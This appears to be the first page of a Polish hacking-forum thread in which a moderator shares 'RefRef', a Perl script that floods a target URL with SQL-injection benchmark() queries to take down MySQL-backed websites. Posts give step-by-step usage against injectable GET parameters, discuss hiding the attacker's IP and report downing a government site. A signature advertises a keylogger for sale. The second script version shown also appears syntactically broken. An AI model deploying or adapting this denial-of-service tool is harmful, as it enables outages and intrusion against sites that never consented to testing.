Strona 1 z 4 123 ... OstatniOstatni
Pokaż wyniki od 1 do 15 z 49

Temat: RefRef 1.3.1 DoS

  1. #1
    Dawni Moderatorzy Avatar VR8
    Dołączył
    24-09-2011
    Skąd
    Kraków
    Posty
    324

    Domyślnie RefRef 1.3.1 DoS

    =======================================
    Nie ponosze odpowiedzialnosci za skutki dzialania tego skryptu
    --------------------------------------------------
    Webloic is only intented for web-server load testing (your OWN web-server), do not use it for large distributed denial of service attacks.

    DDos may severely harm a business by causing a site to slow down or go down completely.

    Causing harm can lead into lawsuits on behalf of the victim.

    Discretion is adviced.
    ======================================
    #RefRef zaprogramowany w Perl:
    Kod:
    #!usr/bin/perl
    #RefRef 1.3.1 (C) Anonymous & NetSec 2011
    
    use LWP::UserAgent;
    use Net::Ping;
     
    my $nave = LWP::UserAgent->new;
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    $nave->timeout(5);
     
    head();
    if($ARGV[0]) {
    now($ARGV[0]);
    } else {
    syntax();
    }
    copyright();
     
    sub now {
    print "\n TARGET : ".$_[0]."\n\n";
    print " AUTHORIZATION...\n";
    my $auth = Net::Ping->new("icmp", 1, 64);
    if ($auth->ping ($_[0])) {
    print " EXPLOITATION...\n";
    while(true) {
    $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
    unless($code->is_success) {
    my $ver = Net::Ping->new("icmp", 1, 64);
    if ($ver->ping ($_[0])) {
    print " ERROR\n";
    } else {
    print " OWNED\n";
    }
    copyright();
    }}} else { 
    print " ERROR\n";
    copyright();
    }}
     
    sub head {
    print "\n\n------------------------------\n";
    }
     
    sub copyright {
    print "\n------------------------------\n\n";
    exit(1);
    }
     
    sub syntax {
    print "\n SYNTAX: $0 \n";
    copyright();
    }
     
    sub toma {
    return $nave->get($_[0]);
    }
    RefRef 1.3.1 ;
    Ostatnio edytowane przez VR8 ; 29-10-2011 o 13:00

  2. #2

    Domyślnie

    Może opisz co to robi, jak tego uzywac? Ja tam perla nie znam, a skryptu "na ślepo" nie mam po co odpalać. x(

  3. #3
    Dawni Moderatorzy Avatar VR8
    Dołączył
    24-09-2011
    Skąd
    Kraków
    Posty
    324

    Domyślnie

    Cytat Napisał michal31337 Zobacz post
    Może opisz co to robi, jak tego uzywac? Ja tam perla nie znam, a skryptu "na ślepo" nie mam po co odpalać. x(
    Co robi? - oto nowa słynna broń Anonymous #RefRef. ( WERSJA 1.3.1 STWORZONA Z POMOCA NetSec )
    Potrafi w niecałe 10 sekund zgnieść serwery / strony internetowe. Sprawia że strona atakuje sama siebie przez co jest pewność działania. To taki SQLi_DOS

    Opyla się znać podstawy wszystkich używanych języków, nie koniecznie pisać w nich programy

    Znajdujesz błąd SQLi Vulnerability, zapisz RefRef na dysu C jako " RefRef.pl " ROZSZERZENIE = PL

    Włączasz CMD i klepiesz:
    C:\RefRef.pl http://cel.pl/blad.php?sql=1'

  4. #4

    Domyślnie

    Grubo :d

    Cytat Napisał VR8 Zobacz post
    Opyla się znać podstawy wszystkich używanych języków, nie koniecznie pisać w nich programy
    Zgadzam się. W moim przypadku na perla kiedyś też przyjdzie czas, lecz jeszcze nie dziś.
    Pora przetestować
    Ostatnio edytowane przez michal31337 ; 02-11-2011 o 15:20

  5. #5
    Użytkownik (R) Avatar djmentos
    Dołączył
    01-05-2007
    Skąd
    Gdansk, Poland, Poland
    Posty
    1 862

    Domyślnie

    Co robi? - oto nowa słynna broń Anonymous #RefRef
    Zbyt wyrafinowana to ona nie jest.

  6. #6
    Dawni Moderatorzy Avatar VR8
    Dołączył
    24-09-2011
    Skąd
    Kraków
    Posty
    324

    Domyślnie

    Cytat Napisał djmentos Zobacz post
    Zbyt wyrafinowana to ona nie jest.
    Ale robi swoje. Też się zdziwiłem jak to zobaczyłem, myślałem o jakimś wypasie ale muszę przyznać, jak pierwszy raz to włączyłem to mi szczęka opadła.

  7. #7
    Użytkownik (R) Avatar djmentos
    Dołączył
    01-05-2007
    Skąd
    Gdansk, Poland, Poland
    Posty
    1 862

    Domyślnie

    Zwykłe użycie funkcji benchmark() co możliwe zapytanie. To logiczne, że będzie działać. Ale na Waszym miejscu uważałbym z używaniem tego na lewo i prawo, bo pamiętaj, że gratis wysyłany jest Twój adres IP. No chyba, że odpowiednio o to zadbaliście.

  8. #8
    Dawni Moderatorzy Avatar VR8
    Dołączył
    24-09-2011
    Skąd
    Kraków
    Posty
    324

    Domyślnie

    Cytat Napisał djmentos Zobacz post
    Zwykłe użycie funkcji benchmark() co możliwe zapytanie. To logiczne, że będzie działać. Ale na Waszym miejscu uważałbym z używaniem tego na lewo i prawo, bo pamiętaj, że gratis wysyłany jest Twój adres IP. No chyba, że odpowiednio o to zadbaliście.
    Oczywiście. Jak napisałem (cytat) ostrzegam że używacie tego na własną odpowiedzialność, zaleca się dyskrecję a użycie może doprowadzić do procesów sądowych ze strony ofiary.

    Można też użyć tej 'trutki' przez przeglądarkę, używając proxy. Kod który wstawiłem to tylko interfejs do tej komendy, dla mniej zaawansowanych.


    W wersji #RefRef 1.4.? będzie ukrywane IP i kilka funkcji, ale potrzebny jest pierwsze pomysł jak to dobrze zrobić, i przede wszystkim troszkę czasu.

    PS. Jest kilka wersji RefRef

    Perl, 1.0.1 - 1.3.1
    Python, 1.0.1
    Javascript, 1.0.1 + funkcja ukrywania IP (Proxy)

    A i nie używamy tego na prawo i lewo, tylko testy na wirtualych maszynach, darmowe hostingi, aż do pełnej anonimowości, czyli 1.4.0/1.4.1 lub 1.5.0/1.5.1
    Ostatnio edytowane przez VR8 ; 03-11-2011 o 21:25

  9. #9

    Domyślnie

    Pewna chińska strona rządowa PRZED...

    Chińska strona rządowa PO...


    Oceniam że działa :]

  10. #10

    Domyślnie

    Cytat Napisał VR8 Zobacz post

    Włączasz CMD i klepiesz:
    C:\RefRef.pl http://cel.pl/blad.php?sql=1'
    Jaka jest zasada podawania drugiej części adresu? Tą część: blad.php?sql=1 mogę skopiować z dowolnej podstrony ?

  11. #11

    Domyślnie

    Michal31337 wow!
    Czas przetestowac...
    the quieter you become, the more you are able to hear

  12. #12
    Dawni Moderatorzy Avatar VR8
    Dołączył
    24-09-2011
    Skąd
    Kraków
    Posty
    324

    Domyślnie

    Cytat Napisał ShutteR Zobacz post
    Jaka jest zasada podawania drugiej części adresu? Tą część: blad.php?sql=1 mogę skopiować z dowolnej podstrony ?
    Jest to zmienna GET w pliku który przykładowo nazwałem blad.php
    Strona jest podatna w 45% przypadkach, gdy w zmiennej GET jest zapytanie do MySQL.

    Podstawy PHP.
    "Najwyższym osiągnięciem jest pokonać wroga bez walki" - Sun Tzu

    ---
    Sprzedam keyloggera wysyłającego logi na maila, do tego masa dodatków (np. USB spreading).
    Kontakt: (gg)41878055
    ---

  13. #13

    Domyślnie

    Witam.
    Nie bardzo rozumiem dlaczego pojawia sie problem z autoryzacja:
    errorvg.jpg

  14. #14
    Dawni Moderatorzy Avatar VR8
    Dołączył
    24-09-2011
    Skąd
    Kraków
    Posty
    324

    Domyślnie

    Cytat Napisał pro+moc=ja Zobacz post
    Witam.
    Nie bardzo rozumiem dlaczego pojawia sie problem z autoryzacja:
    errorvg.jpg
    Nie wiem czemu ale na "nowszych" stronach skrypt szwankuje. Trzymaj starszą wersję:

    Kod:
    #!usr/bin/perl
    #RefRef 1.2.0 (C) VR Eight & Anonymous 2011
    
    use LWP::UserAgent;
     
    my $nave = LWP::UserAgent->new;
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    $nave->timeout(5);
     
    head();
    if($ARGV[0]) {
    now($ARGV[0]);
    } else {
    syntax();
    }
    copyright();
     
    sub now {
    print "\n TARGET : ".$_[0]."\n\n";
    print " EXPLOITATION...\n";
    while(true) {
    $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
    unless($code->is_success) {
    print " OWNED\n";
    }
    copyright();
    } else { 
    print " ERROR\n";
    copyright();
    }}
     
    sub head {
    print "\n\n------------------------------\n";
    }
     
    sub copyright {
    print "\n------------------------------\n\n";
    exit(1);
    }
     
    sub syntax {
    print "\n SYNTAX: $0 \n";
    copyright();
    }
     
    sub toma {
    return $nave->get($_[0]);
    }
    Ostatnio edytowane przez VR8 ; 08-01-2012 o 00:20
    "Najwyższym osiągnięciem jest pokonać wroga bez walki" - Sun Tzu

    ---
    Sprzedam keyloggera wysyłającego logi na maila, do tego masa dodatków (np. USB spreading).
    Kontakt: (gg)41878055
    ---

  15. #15

    Domyślnie

    Dzieks wielke za odzew, ale jest "nowy" problem:
    error2gs.jpg

    pliki bat:
    start /min test.bat
    pause
    boucle.bat

Uprawnienia

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •